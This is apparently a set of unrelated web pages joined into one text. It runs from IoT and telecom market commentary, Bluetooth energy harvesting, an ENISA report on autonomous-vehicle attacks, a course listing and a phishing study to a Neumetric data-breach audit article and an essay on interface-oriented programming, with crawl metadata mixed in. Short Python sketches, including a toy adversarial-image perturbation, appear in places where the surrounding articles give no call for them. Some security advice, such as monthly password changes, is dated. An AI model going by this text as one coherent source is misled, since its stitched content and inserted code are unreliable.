The concept of connecting devices to the Internet goes back further than the Internet itself. In 1982, researchers at Carnegie-Mellon University hooked up a modified Coca-Cola machine to Arpanet, one of the precursors of the Internet using the TCP/IP protocol. The machine could report back on its inventory and the temperature of the cans.
The term “Internet of Things” was coined in a speech by Peter T. Lewis, to the Congressional Black Caucus Foundation in Washington, DC in September 1985.
Lewis said: "The Internet of Things, or IoT, is the integration of people, processes, and technology with connectable devices and sensors to enable remote monitoring, status, manipulation, and evaluation of trends of such devices."
This was before Wi-Fi, Bluetooth, and other short-range communications technologies which would eventually make the IoT possible, but the tech industry returned to the idea repeatedly until it started to happen, also using other terms such as M2M - machine to machine.
By 2009, Cisco estimated that there were already more ‘things’ connected to the Internet than people on Earth (then around 6.8 billion).
Today, it’s estimated that there are around 12.2 billion IoT active endpoints globally, according to figures from IoT Analytics, a firm that specializes in market insights for this sector. Humans, meanwhile, have increased to 7.83 billion.
IoT Analytics predicts the number of devices on the Internet will more than double by 2025 to 27 billion.
Is it just hype?
“About a decade ago, IoT became the big new thing and there was a lot of hype,” says IDC IoT industry analyst John Gole.
But have operators fully tapped into the benefits that IoT brings? Gole says that initially operators struggled, as there was no ecosystem in place and the IoT market was, in his words, "immature."
“All the telcos were rushing in and wanted to take advantage of this big new opportunity, but struggled because it was a challenging environment to be in.”
According to Gole, the mobile network providers felt they had an obligation to drive IoT, and if this was to be the case, the market had to start emerging. At that time, mobile phone use in developed economies was reaching saturation, and mobile operators were shifting away from just selling phone calls toward offering data, as demand for services beyond texting and calling grew.
Beyond that, once people are using all the data they can, the next logical expansion would be to start connecting devices.
“IoT is not a single use case or single market. Telcos really enjoyed the mobile phone business where essentially everyone in the world needed a mobile phone in the past, but that’s now switched more towards data as demand for this grows.”
His comments echo a report by the GSMA, which effectively says that operators could do more with IoT.
GSMA figures from 2020 estimate that by 2025 the IoT market will be worth a whopping $900bn to the global economy.
However, the same report revealed that connectivity will be worth $48bn, which is just five percent of this overall figure. For context, applications, platforms, and services are tipped to account for 67 percent of the overall market.
According to Iris IoT Solutions managing director Stephen Westley, IoT is the next “golden egg for mobile network operators.”
“Mobile networks are looking at the next revenue stream and IoT is that for them, it’s a golden egg.”
UK-based Iris Solutions provides IoT solutions to its customers, including cold storage trackers, fall sensors, and GPS trackers.
The company works with mobile network operator Vodafone, one of the biggest mobile network operators in the world.
Operators pushing IoT
Despite Westley and others suggesting a vast monetary potential of IoT for operators, are these companies doing enough to tap into this market?
One mobile network operator that has been highly vocal about its IoT and Edge advancements is that name again, Vodafone.
The operator claims to have more than 150 million connections on its global IoT network and has been very active in demonstrating its achievements centered around various use cases.
Whereas a lot of mobile network operators tend to focus heavily on their consumer business and push mobile phone contracts, Vodafone appears to place IoT as a key pillar of its business model.
The UK-based company recently outlined its intentions to develop a new mass-market precise positioning system that can locate IoT devices, machinery, and vehicles.
This scheme will initially be piloted in the UK, Germany, and Spain, and Vodafone expects it to provide better accuracy than using individual global navigation satellite systems (GNSS) alone.
Vodafone claims that location accuracy will improve from a few meters to just centimeters, using Topcon's European network, which is comprised of thousands of GNSS reference stations.
“As new technologies like autonomous cars and connected machinery continue to evolve, Vodafone is providing the critical connections to support these new services with greater precision, more safety, and at scale," said Vodafone Business director for platforms and solutions Justin Shields in early September.
Beyond Vodafone, there are plenty of other examples of operators getting stuck into the opportunities afforded by IoT.
Deutsche Telekom and T-Mobile US recently demonstrated a different type of IoT use case, partnering with cleaning technology and equipment company ICE Cobotics to support its i-Synergy fleet management software.
Using T-Mobile's IoT, ICE Cobotics will connect and manage more than 7,500 new and existing cleaning units worldwide. This will enable its customers to make better decisions based on near real-time data, while reducing downtime through remote notifications, with performance analyzed from a remote location.
Vodafone has also launched its own dedicated program for businesses called ‘Edge Innovation Programme 2.0’, where businesses can test new use cases and roll out smart services and products using Multi-access Edge Computing (MEC) technology.
This form of the Edge is designed to bring services and processes closer to the user, or "closer to the Edge." It moves data away from the centralized cloud and closer to the edge of the network, so a large part of the processing can be done by Edge resources.
MEC is a relatively new segment of the market, but certainly a growing one. So much so that Gartner predicts that by next year more than 50 percent of enterprise-generated data will be created and processed outside of the data center or cloud, up from less than 10 percent in 2019.
Vodafone has worked with Amazon Web Services (AWS) to launch these MEC services delivered with AWS Wavelength for customers in the UK.
Before this, the operator did several trials with companies across a range of areas, including sports technology, autonomous transport, biometric security, remote virtual reality, and factory automation.
Beyond speed and latency capabilities, Vodafone says that MEC also enhances security, with distributed deployments minimizing the impact of cybersecurity incidents, while cost is reduced, and scale offers increased capacity.
Covid boosted IoT use
The global pandemic has played a big part in IoT adoption, adds Westley, who believes that the need for connectivity and instant data has been driven forward as a result.
“One of the things I think that has opened people's eyes to the power of IoT, and especially since the pandemic, is that we don't need to do as many manual tasks anymore,” he said.
“This is the whole point of IoT, as its purpose is around creating efficiencies, and data for people to give them better insights.”
Some might counter-argue that IoT could reduce job opportunities, with businesses instead focusing on automated systems or even making use of robot workers.
However, Westley shuts down this idea, noting that IoT will instead create other roles.
“The growth of IoT means effectively that job specs are changing, and it means that companies can become more efficient. Most businesses at the moment are overstretched and demand-powered, so having IoT, through things such as sensors that can transmit instant data, helps to alleviate some of these problems.”
“IoT isn’t here to replace manpower, it’s here to better analyze data, and diverge focus elsewhere,” he added.
More specifically relating to Edge, Westley adds that IoT needs to work closely with Edge when it comes to processing data.
“For some of the projects, we’re doing there’s quite a lot of data processing. So if we can get the data on the Edge so that the device is making those decisions this means you’re only sending out the necessary data, and in turn reducing the data levels over the networks, which is good for us, because it helps with things such as battery life. If we’re saving on battery power, it saves us time and money.
“The more processing we can do on the Edge, the better it is for us, and also other IoT companies. It helps us make informed decisions on the Edge, as opposed to the backhaul.”
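A minimal sketch of that edge-side decision, with invented sensor values and a simple standard-deviation threshold standing in for real anomaly logic:

```python
import random
import statistics

THRESHOLD = 2.0  # only report readings this many std-devs from the mean

def edge_filter(readings: list[float]) -> list[float]:
    """Decide on the device which samples are worth transmitting.
    Sending only anomalies cuts radio time, which is what saves
    battery and backhaul bandwidth in the scenario described above."""
    mean = statistics.fmean(readings)
    sd = statistics.pstdev(readings) or 1.0
    return [r for r in readings if abs(r - mean) / sd > THRESHOLD]

samples = [random.gauss(20.0, 0.5) for _ in range(500)] + [35.0]  # one fault
print(edge_filter(samples))  # typically only the 35.0 outlier goes upstream
```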
The technology industry is engaged in a massive effort around sustainability, as the demand for data pushes data centers to grow ever bigger, with a corresponding increase in their environmental footprint.
Some of the largest hyperscalers have outlined their ambitions to be more carbon-neutral, including Amazon, Microsoft, and Google.
The arrival of the Edge could mean much more energy used in tech applications. The Edge will clearly have its own footprint, on top of that of the cloud housed in centralized facilities.
However, sustainability could actually become a selling point for IoT. Many IoT applications increase efficiencies elsewhere, and produce a positive benefit, sometimes referred to as a “handprint.”
This is backed up by a report conducted by Ericsson which says that the ICT sector as a whole has the potential to cut carbon emissions by up to 15 percent by 2030. The report reckoned that total global emissions would be 63.5 gigatons per year by 2030, and ICT could shave between seven and 15 percent off that.
This figure depends on multiple industrial sectors participating, but most of the benefits, in sectors like agriculture and smart buildings, are very clearly based on the use of IoT.
Westley agrees that IoT will enable long-term and potentially optimistic targets around cutting carbon emissions, making them a reality for businesses.
As well as cutting emissions, Gole adds that the use of IoT properly will enable businesses to make better decisions.
He says that IoT is providing the data to make these decisions for businesses.
“Almost all use cases that I can think of relating to IoT are about providing data for better visibility so that you can make better decisions. A lot of the time, this will link in with efficiencies, such as energy and asset monitoring.”
Internet of Things (IoT) has revolutionized several industries, opening up new avenues for innovation and economic growth. However, this new era of connectivity has also created a serious battery problem. Billions of batteries are getting thrown out each year, contaminating landfills around the world.
The first step to enabling energy harvesting is to create an ultra-low power connectivity solution. If a device can operate on harvested energy alone, the need for charging or a permanent power cord is eliminated. By combining wireless technology and energy harvesting solutions, true wireless – as in no power cord needed – is a possibility for edge IoT devices.
So, where can this technology be implemented in the day-to-day world? This article will examine five industries – healthcare, hospitality, retail, smart home, and sports – that energy harvesting technology can help make more efficient and sustainable.
A continuous glucose monitor (CGM) is one type of healthcare wearable perfect for energy harvesting technology. While traditional CGMs need to be charged regularly since they are in constant use, energy harvesting means that users no longer have to worry about constantly charging their CGMs. Plus, Bluetooth 5 wireless solutions open up the possibility for remote monitoring, with four times the range of previous Bluetooth generations. This means that doctors can more easily monitor their patients, or parents can monitor their children anytime, anywhere via a browser or smartphone application.
Most hotels use door card readers that are battery-powered. While this offers several advantages (such as the ability to operate even during a power outage), replacing batteries in the hundreds or even thousands of door card readers in a hotel is extremely time-intensive and expensive. Using Bluetooth 5 devices with energy harvesting technology cuts down on maintenance time and total cost of ownership, in addition to supporting hotels’ green initiatives.
Paper tags will soon become a thing of the past as retailers turn to programmable electronic shelf labels (ESLs) and other digital signage. One big benefit of electronic signage is that updates can automatically be applied across all products. Still, the downside is that many of these devices are battery-operated, creating a headache when it comes time to swap out the batteries for every ESL in a store. Controlled energy harvesting enables retailers to set up Bluetooth 5 ESLs effortlessly, without worrying about maintenance down the road, in addition to the cost savings of not having to replace batteries constantly.
Our homes are filled with connected devices, including wearables, smartwatches, fitness trackers, and gaming devices, to name a few. Many of these devices need to be charged often, while others use batteries that need to be replaced anywhere from every few months to every few years. With energy harvesting, these connected devices could run for the device’s entire lifetime, saving you the time and hassle of charging devices and replacing batteries.
Sports Venues and Factory Environments
Location devices are already popular in sports stadiums and factories and will continue to become more popular as more venues turn to energy harvesting solutions. Electronic badges, or eBadges, are another great example. Many facilities already rely on eBadges to allow people to access different parts of their buildings. As sports venues and factories update their existing systems, they will increasingly turn to Bluetooth 5 eBadges with energy harvesting technology.
These five industries represent just a small portion of the markets that will benefit from the implementation of Bluetooth 5 energy harvesting technology. As IoT continues to grow, so will the opportunities for energy harvesting and battery-free connected devices.
A new European Union Agency for Cybersecurity (ENISA) report has found that autonomous vehicles are “highly vulnerable to a wide range of attacks” that could be dangerous for passengers, pedestrians, and people in other vehicles. Attacks considered in the report include sensor attacks with beams of light, overwhelming object detection systems, back-end malicious activity, and adversarial machine learning attacks presented in training data or the physical world.
Ilya Khivrich, Chief Scientist at Vdoo:
“Resilient and safety-critical systems nowadays must be designed with a potential attacker’s perspective in mind. This problem is especially complicated for systems reliant on machine learning (ML) algorithms, which are trained to behave properly under normal circumstances, and may respond in unexpected ways to engineered manipulation or spoofing of data they receive from the sensors. This is a challenging gap to bridge, and we believe that new tooling will be required to cope with these issues.”
Paul Bischoff, privacy advocate and research lead at Comparitech:
“How easy it is to hack cars depends on the vehicle, what computerized systems are in place, and whether those systems are connected to the internet. A car’s entertainment system is often hooked up to the internet and needs to communicate with any number of sources, so it has a wider attack surface. An autonomous vehicle might need to download system updates over the internet, but it only ever needs to connect to one destination, the update server. That makes securing it a bit easier. Then there are systems that are completely sequestered from the internet that would require physical access to hack. Like many internet-of-things devices, manufacturers often build features first and consider security an afterthought. I think automobile security will continue to improve as time goes on. The ENISA report specifically discusses how AI-driven autonomous driving systems can be tricked into not recognizing or misrecognizing traffic, road conditions, or signs. Autonomous vehicles use painted lines on roads to stay in lane, for example. An attacker could paint false lines on a road or vandalize traffic signs to interfere with the AI. We might see some malicious actors try to hack vehicles and disrupt automated driving AI systems, and those actions could cause traffic accidents. However, we should also consider what incentive a hacker would have to hack a car. There’s no clear or direct financial motive, so I don’t think such attacks will be very widespread or prevalent.”
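Many of the sensor and training-data attacks ENISA describes build on adversarial perturbations. The following Python sketch shows the one-step FGSM idea on a toy image, with a made-up gradient standing in for one obtained from an attacked model; it is illustrative only, not a reproduction of any attack in the report.

```python
import numpy as np

def fgsm_perturb(image: np.ndarray, gradient: np.ndarray, eps: float = 0.03):
    """One-step adversarial nudge: move each pixel slightly in the
    direction that increases the classifier's loss. 'gradient' is the
    loss gradient w.r.t. the input, obtained from the attacked model."""
    adversarial = image + eps * np.sign(gradient)
    return np.clip(adversarial, 0.0, 1.0)  # keep pixel values valid

# toy stand-ins: a 32x32 "sign" image and an invented gradient
rng = np.random.default_rng(0)
img = rng.random((32, 32))
grad = rng.standard_normal((32, 32))
print(np.abs(fgsm_perturb(img, grad) - img).max())  # at most eps per pixel
```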
Chris Hauk, consumer privacy champion at Pixel Privacy:
“Any electronic device with an internet connection or a USB port is a hacking target. I have read reports that a modern luxury vehicle could contain up to 100 million lines of software code. A fully autonomous self-driving vehicle is likely to contain many more lines of code than said luxury vehicle. Much if this code is likely unoptimized and may have not been stringently tested for security holes. This makes a self-driving vehicle an attractive target for the bad actors of the world. The popularity and hype surrounding self-driving vehicles make them an attractive target for hackers searching for another income stream or mischief making target. Hackers could target autonomous cars with malware that could “park” the car, leaving it inactive until a ransom is paid. Theoretically, a hacker could take remote control of a vehicle, stranding the passengers in the middle of a highway or intersection, causing gridlock. Or, like a chapter from a bad science fiction murder mystery, they could remotely drive the vehicle off of a cliff.”
Creator: Johns Hopkins University
Category: Software > Computer Software > Educational Software
Topic: Basic Science, Health
Tag: collaboration, environment, health, medicine, safety
Availability: In stock
Price: USD 49.00
Welcome to the Evidence-based Toxicology (EBT) course.
In medicine and healthcare, evidence-based medicine has revolutionized the way that information is evaluated transparently and objectively. Over the past ten years, a movement in North America and Europe has attempted to translate this revolution to the field of toxicology. The Center for Alternatives to Animal Testing (CAAT) within the department of Environmental Health and Engineering at the Johns Hopkins Bloomberg School of Public Health hosts the first chair for EBT and the secretariat for the EBT Collaboration on both sides of the Atlantic. Based on the Cochrane Collaboration in Evidence-based Medicine, the EBT Collaboration was established at the CAAT to foster the development of a process for quality assurance of new toxicity tests for the assessment of safety in humans and the environment. Regulatory safety sciences have undergone remarkably little change in the past fifty years. At the same time, our knowledge in the life sciences is doubling about every seven years. Systematic review and related evidence-based approaches are beginning to be adapted by regulatory agencies like the Environment Protection Agency (EPA), the European Food Safety Authority (EFSA), and the US National Toxicology Program. They provide transparent, objective, and consistent tools to identify, select, appraise, and extract evidence across studies. This course will showcase these emerging efforts and address opportunities and challenges to the expanded use of these tools within toxicology.
Study Confirms Phishing Scams A Danger To All Users
Phishing scams are attempts to trick users into giving out personal information so hackers can use it to break into accounts and steal identities. Most phishing scams start with an email that directs users to a website where they’re asked for information like their phone number, physical address and even social security number or banking information. There are a number of tell-tale signs of a phishing email, which leads many people to believe they could never fall for one. As Sam Narisi of IT Manager Daily reports, a recent study by the Polytechnic Institute of New York suggests otherwise.
The study consisted of 100 science and engineering students. The students were given a personality test and asked about their computer use and proficiency. The researchers then anonymously sent a phishing scam to their personal accounts. The email included the usual signs of a scam, including misspellings and other errors. Still, 17 students fell for it and willingly gave out personal information.
What this study uncovers is that everyone is at risk of becoming a victim of a phishing scam. Because of the social engineering built into these scams, and carelessness by users, even the most educated individual can still be a victim.
This extends to other threats, like malware, that infect your system through careless user actions. When a user isn’t extremely cautious online, bad things happen. This is costly for users on their personal computers at home, but it’s a huge risk for businesses who have to safeguard their entire network from numerous careless users.
Education is a great place to start to protect yourself and your office. Knowing what to look for in a potential cyber threat is important, despite the results of the study. Additional security measures also need to be put in place, however, with the knowledge that, eventually, someone is going to click on the wrong link.
To improve the security on any of your devices, at home or at the office, contact Geek Rescue at 918-369-4335.
October 10th, 2013
Table of Contents
A data breach is an event in which unauthorised individuals gain access to a company’s computers, networks or mobile devices and steal sensitive data. The goal of the theft may be to sell the information on the dark web or use it for identity theft. A successful data breach can have serious consequences for both the companies and their customers, because it affects more than just personal information like social security numbers and credit cards; it often includes vital business files as well.
What is an Internal Security Audit?
An Internal Security Audit is a process of evaluating an organisation’s security program and practices. It is an independent, objective assurance and consulting activity designed to add value and improve an organisation’s operations. These audits are conducted by trained auditors whose aim is to provide management with useful information regarding the effectiveness of the organisation’s information security program.
Security audits can be performed on an ongoing basis to ensure that an organisation’s information security procedures stay in line with best practices as well as when there are changes made in the company’s infrastructure (e.g., new software implementation).
Security audits are performed as part of an organisation’s risk management strategy and to ensure that they comply with any laws or regulations that may apply. The audit process includes assessing the organisation’s security posture, identifying risks or areas of non-compliance with policies or procedures, making recommendations for improvement (e.g., eliminating vulnerabilities) and measuring the effectiveness of those improvements over time.
Should Your Company Be Concerned About Data Breach?
The short answer is yes. Data breaches are a serious matter and can have devastating effects on a business. A data breach is an event in which unauthorised access to information occurs, often due to the actions of malicious attackers or system administrators. Data breaches may expose sensitive personal information such as account numbers, credit card numbers and social security numbers. They could also expose confidential documents containing intellectual property or trade secret information that competitors could use to gain an unfair advantage in the marketplace.
Data breaches can lead to lawsuits, fines and loss of customer trust and loyalty with the potential cost estimated at billions per year globally.
Data Breach: What Causes Them?
Data breaches can be caused by a variety of factors, including human error, malware, and cyber criminals. Data breaches can happen to anyone, but not all data breaches are treated equally. The type of data that was exposed and the number of people affected can determine whether a company is liable for a data breach. In addition, there are laws in place that hold companies accountable for not taking reasonable steps to protect sensitive information from unauthorised access or disclosure.
Data breaches can be caused by human errors such as the accidental loss or theft of a device containing confidential information, as well as malicious intent such as hacking. The most common cause of data breaches is human error, which can happen in any Organisation. For example, an employee might accidentally send an email with confidential data to the wrong recipient or leave a device containing sensitive information unattended and accessible to others.
Data breaches are also caused through malware and viruses that can infect computers and network systems. Malware is a form of software designed to disrupt or damage computers and computer networks. It’s often used by cybercriminals to steal personal data and financial information, such as credit card numbers, Social Security numbers and bank account details.
How to Avoid Data Breach
Conducting regular internal audits is essential to preventing data breaches. Internal audits can help you ensure that your company’s security policies are being followed, that employees are taking precautions to protect sensitive information and that you’re aware of any vulnerabilities in your network. Conducting regular internal audits on your systems and software is one of the best ways to identify vulnerabilities.
Here are just some of the things that regular internal audits help you identify:
- Usage of strong passwords.
- How well employees are trained on information security aspects.
- Usage of antivirus software to protect against viruses and malware and keeping all systems up-to-date.
- Usage of two-factor authentication whenever possible to prevent unauthorised access to your account.
- Implementation of information security systems such as firewalls, intrusion detection systems and encryption to protect data.
- Protection of physical access to your network with secure facilities and controlled building access.
- Implementation of an effective incident response plan for security incidents and training of employees on how to respond to such events, etc.
How to Avoid Breaches Caused by Phishing
Phishing is the most common way for hackers to gain access to your personal data. To avoid being phished, never open emails from unknown senders, click links in unsolicited emails or open attachments in unsolicited emails. Don’t provide any personal or sensitive information via email – instead, go directly to the website you are trying to reach and enter your information there. It’s also important to keep your anti-virus software up-to-date and running. This will help prevent any malware from entering your system.
Security Internal Audit and data breach prevention
An Internal Security Audit is an internal control review of your IT and information security systems. It can be performed on a regular basis (e.g., every year) or in response to specific events such as data breaches or cyber attacks that you may have experienced.
What is the purpose of an Internal Security Audit?
There are several reasons why companies need to conduct an Internal Security Audit. Some of them are:
- Before conducting any new project, it is important to ensure that the current state of your system meets the requirements for what you want to achieve with this project;
- If there are any violations in the way your company handles personal data, then these violations need to be addressed;
- You might want to assess whether all employees understand their information security responsibilities within the organisation and if their behaviours match their understanding;
One of the most important reasons for conducting an Internal Security Audit is to identify vulnerabilities in your IT and information security systems. If you want to make sure that your organisation stays one step ahead of cyber criminals, then regular audits should become part of your security strategy. Some examples of vulnerabilities that may be uncovered during an audit include:
- Outdated software or hardware
- Lack of encryption
- Incorrect configuration settings
If all security weaknesses are fixed before they get exploited by cyber criminals, then you can significantly reduce the risk of a data breach. An Internal Security Audit can help you find and fix these vulnerabilities, thereby minimising your risk of suffering a costly data breach. What’s more, you will be able to show that you take your security responsibilities seriously if an external auditor comes knocking at your door.
The consequences of a data breach can be severe for any organisation, as well as for the people whose private information gets exposed. Even if you aren’t responsible for breaching anyone’s data, you can still suffer from reputational damage that may take years to recover from. If your business suffers a data breach, then you could see your profits drop significantly and maybe even go out of business.
How to Prevent Password Loss, Theft, and Cracking
Another way to prevent the loss, theft and cracking of passwords is to use strong passwords. A strong password is one that:
- Is long and complex, with at least 13 characters
- Does not contain your name, birth date or any other personal information
- Has a mixture of letters, numbers and special characters (e.g., !@#$%^&*)
If you can’t remember your current password, consider writing it down in an encrypted file on an external hard drive or USB stick. You can also set up a secure desktop password manager like LastPass which gives you a random string of characters when needed. Always change your passwords regularly (once a month is best) as well as using multi-factor authentication where possible so that even if someone gets hold of one set of credentials they won’t be able to get into everything else in your online life.
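If you generate passwords yourself rather than via a manager, a sketch along these lines (Python's standard secrets module, with an assumed symbol set) follows the length and mixture advice above:

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def generate_password(length: int = 16) -> str:
    """Random password built from a CSPRNG (the secrets module),
    matching the length and character-mixture advice above."""
    if length < 13:
        raise ValueError("use at least 13 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(generate_password())
```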
How to Stop Ransomware Security Breaches
You may have heard of ransomware, a type of malware that encrypts files on your computer and then demands payment in order to decrypt them. The ransom is usually paid in the form of bitcoins or other cryptocurrencies, which can be more difficult for law enforcement to trace than cash. But there are ways to protect yourself from ransomware.
The first is to ensure that you have a strong antivirus program installed on your computer. It can help detect and remove malware before it has a chance to encrypt your files. Next, make sure your operating system is up to date. Many ransomware attacks exploit known vulnerabilities in older versions of Windows, so it’s important that you have the latest security patches installed. Finally, keep a backup copy of all your important files somewhere outside of your computer’s hard drive (such as on an external drive or cloud storage). This way, if your computer does get hacked and encrypted by ransomware, you won’t lose any data—just reinstall from your backup copy!
How to Stop Spyware Infiltrations
Spyware is malicious software that instals itself on your computer and collects information about you, such as your passwords, credit card numbers and other personal details. It can also be used to monitor your activity on the web. Spyware is often bundled with free programs that people download from the internet or receive via email attachments.
Once installed, spyware will run in the background of your computer without any indication that it’s there. The most common types of spyware will make themselves known when they start displaying ads on websites that you visit or popping up messages asking for additional permissions (which should never be granted). Once these advertisements start appearing, chances are high that the system has been compromised by some form of malware infection or virus attack; this needs urgent attention if users want to avoid losing their data altogether!
The best way to avoid spyware is to install a quality antivirus program on your computer. These programs are designed specifically to detect and remove any form of malware infection, including spyware. If you already have an antivirus program installed on your system and find that it isn’t protecting you from spyware infections, then it’s time to switch to another one (or upgrade if necessary).
How Configuration Management Can Help You Prevent Data Breaches
Configuration management is a process that ensures all devices are configured consistently. By enforcing a known-good baseline, it helps you prevent data breaches and makes it easier to spot unauthorised changes to your network.
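One lightweight way to spot unauthorised changes is to fingerprint each device's configuration and compare it to an approved baseline. The sketch below (with an invented baseline and plain SHA-256 hashing) shows the idea:

```python
import hashlib
import json

BASELINE = {"firewall": "on", "ssh_root_login": "no", "tls_min": "1.2"}

def fingerprint(config: dict) -> str:
    # Canonical JSON so logically equal configs hash identically.
    return hashlib.sha256(json.dumps(config, sort_keys=True).encode()).hexdigest()

def drifted(device_config: dict) -> bool:
    """True when a device no longer matches the approved baseline."""
    return fingerprint(device_config) != fingerprint(BASELINE)

print(drifted({"firewall": "on", "ssh_root_login": "yes", "tls_min": "1.2"}))  # True
```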
How to Prevent Data Breaches from Third and Fourth Parties
The best way to prevent data breaches from third and fourth parties is to avoid sharing your data with them. However, if you are required by regulation or law to provide data to another Organisation, then you should take steps to ensure that the data is protected against unauthorised access. One of the simplest ways to do this is by using encryption.
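As a minimal illustration of protecting data you are required to share, the following sketch uses symmetric encryption from the widely used Python cryptography package; key management, which is the hard part in practice, is deliberately glossed over here.

```python
from cryptography.fernet import Fernet  # pip install cryptography

key = Fernet.generate_key()        # keep this out of the shared channel
box = Fernet(key)

payload = b"customer_id=1042;account=XXXX"
token = box.encrypt(payload)       # what the third party actually receives
print(box.decrypt(token) == payload)  # True - only key holders can read it
```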
It is also important to verify the security of third parties before engaging with them. If you are not sure how secure a third party is, then you should ask questions before entering into any agreement with them. Conducting in-depth due diligence on third parties can help you to identify potential risks and protect your business. You should also ensure that you carry out regular reviews of all third parties, both internal and external, in order to ensure that they are operating securely.
In this article, we have discussed how internal audits can help you prevent security breaches. The first step is to identify the areas where vulnerabilities exist and then implement the appropriate controls to address them. If your company doesn’t have an internal audit team, then it’s time to start looking for one!
Neumetric, a products and services company, helps Organisations conduct effective internal audit programs to prevent data breaches and cyber attacks. We provide state-of-the-art security solutions that help organisations meet their compliance requirements and protect their most valuable asset: Data! To know more about our Information Security Programs, click here.
Why is auditing important in cyber security?
Auditing is important in cyber security because it helps to identify and quantify risks. It also allows you to assess the effectiveness of your security measures and determine whether they are adequate or need to be improved. Auditing can be performed manually or with the use of software tools.
Why is auditing important for networks?
A network audit is important for network security because it allows you to identify the vulnerabilities in your infrastructure and take measures to reduce them. It also helps you understand how data flows through your network so that you can implement policies that restrict unauthorised access.
How do you conduct an internal security audit?
To start, you should conduct a security audit. This is the process of examining your network and computer systems to find possible weaknesses in your defences.
Next, you should conduct a risk assessment. This is an analysis of the potential consequences of a breach or other cyber attack. Risk assessments help determine the probability that an attack will occur and what type of damage can result from it.
After conducting both audits and risk assessments, you can then decide whether or not to move forward with additional actions such as penetration testing or vulnerability scanning!
How can security breaches be prevented in the workplace?
Security breaches can be prevented to a great extent by using the right tools and by ensuring that your employees are trained in cybersecurity best practices.
How do you prevent security breaches and ensure that company data is secure?
Having a security policy in place helps in preventing data breaches. This is not just any other document that you will file away in your hard drive, but rather a living document that must be reviewed and updated regularly. You should also have a strong password policy, as well as patch management processes, user education programs, and IT governance processes. | <urn:uuid:32f04a19-7a40-43b8-9201-36d2ccef774d> | CC-MAIN-2024-38 | https://www.neumetric.com/how-internal-audits-can-help-you-prevent-data-breaches/ | 2024-09-14T16:42:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00520.warc.gz | en | 0.941151 | 2,875 | 3 | 3 |
So you've completed your Windows 2000 compatible product and you are ready to release it to the world. One small problem: you've coded for some new Windows APIs that aren't available in NT 4.0, and Win2K is still in beta three. Hopefully you've got enough cash on hand to bide your time. This is just one scenario in which using interface-oriented programming can help insulate you and your code from changes beyond your control.
An interface is defined as the set of methods a class can perform plus the set of properties the class exposes. In some languages, there is no difference between a method and a property because each property is represented by pairs of methods such as GetMyProperty() and SetMyProperty(). By forcing others to refer to our classes only via the public interface and by only referencing others via their public interface, we can reduce the shock that typically accompanies future product changes.
Some of you are probably nodding along and thinking to yourselves, "Eric, you've just described Microsoft's COM architecture." You would be right. COM is an interface-oriented architecture, but it does not have a monopoly on this methodology. COM does, however, highlight another important interface-oriented programming technique -- naming interfaces. Concerning naming, we should agree to do three things: name the interfaces we support, change the name of the interface if it ever changes and support both the newly named interface as well as the older interface. By following these conventions, the resulting objects will be less brittle when used by newer and older systems. Naming interfaces helps ActiveX components behave well in dozens of versions of different development tools. Incidentally, Microsoft happens to use a large binary number -- called a GUID -- to name its interfaces, but that is not required to do interface-oriented programming.
Even if you're not ready to embrace COM, either because of its complexity or because of your own cross-platform needs, you can still use interfaces to improve your code. Interfaces are natively supported by Java, Visual Basic and Delphi and, indirectly, by C++ -- although various vendors have added direct interface support. In traditional object-oriented solutions, a lot of emphasis is placed on creating a class hierarchy: classes typically inherit the behaviors of their parents and then add some additional behavior of their own.
Interface-orientation de-emphasizes class hierarchy, replacing it with interface aggregation. Each class then chooses a distinct set of interfaces to implement, without any regard for related classes.
Experience has taught me that traditional object-oriented inheritance is often where good code turns brittle, especially if an expert didn't create your original class hierarchy.
Using interfaces in C++, for example, can help you avoid some of the dangers of a bad hierarchy. In C++, an interface definition is typically a pure abstract class -- no implementation -- with only public methods and no member variables. You can then aggregate the interfaces your class supports by using multiple inheritance. You don't have to worry about the horror stories related to using multiple inheritance either: you aren't inheriting any data or implementation, just interfaces. The beauty of this technique is that you can share your classes by sharing header files containing only interfaces, so you have no worries about others making assumptions about how your class works. Since no one can guess how your class works from the header file, you are always free to change the implementation, including adding new interfaces, provided the original interface remains the same.
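To make the pattern concrete, here is a minimal sketch of interface aggregation. The article's examples are C++, but the idea translates; this version uses Python's abc module, and the class and method names are hypothetical:

```python
import sys
from abc import ABC, abstractmethod

# Each "interface" is pure abstraction: public methods only, no data, no code.
class Printable(ABC):
    @abstractmethod
    def print_to(self, device): ...

class Serializable(ABC):
    @abstractmethod
    def to_bytes(self) -> bytes: ...

# A class aggregates exactly the interfaces it supports; callers see no
# implementation hierarchy to make assumptions about.
class Invoice(Printable, Serializable):
    def __init__(self, total):
        self.total = total

    def print_to(self, device):
        device.write(f"Invoice total: {self.total}\n")

    def to_bytes(self) -> bytes:
        return str(self.total).encode()

# Code that depends only on an interface keeps working no matter how the
# implementation behind it changes.
def archive(item: Serializable) -> bytes:
    return item.to_bytes()

invoice = Invoice(42)
invoice.print_to(sys.stdout)
print(archive(invoice))  # b'42'
```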
In addition to providing future flexibility, interface-orientation often simplifies design. Interfaces allow a divide-and-conquer approach to class design by removing or deferring the use of inheritance until implementation. Each logical group of functions that a class should perform can be grouped into an interface definition. Once the desired interfaces are written, similar interfaces can be combined. Traditional inheritance can then be introduced for implementation, if appropriate. In languages that support template programming, you can write templates that will automatically implement the interface for any class that aggregates the template, avoiding implementation inheritance entirely. This is exactly the approach taken by Microsoft’s Active Template Library (ATL).
In the past, PC solutions have often had short lifecycles. But as more enterprise solutions migrate to PCs, we need to adopt techniques that help our solutions last through multiple operating system releases and changes to third party libraries. Interface-oriented programming is one such technique. Your best source for learning interface-oriented programming today is to study how various Windows development tools implement COM. Microsoft’s ATL is complex, but it is a tour de force in interface programming. Armed with these techniques, you can be sure that you are well-insulated before you expose yourself. --Eric Binary Anderson is a development manager at PeopleSoft's PeopleTools division (Pleasanton, Calif.) and has his own consulting business, Binary Solutions. Contact him at firstname.lastname@example.org. | <urn:uuid:7b1f6f72-ba1f-4748-85c5-635a91997ea4> | CC-MAIN-2024-38 | https://esj.com/articles/1999/06/09/interface-insulation_633718593381868565.aspx | 2024-09-15T23:47:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00420.warc.gz | en | 0.92926 | 1,007 | 3.28125 | 3 |
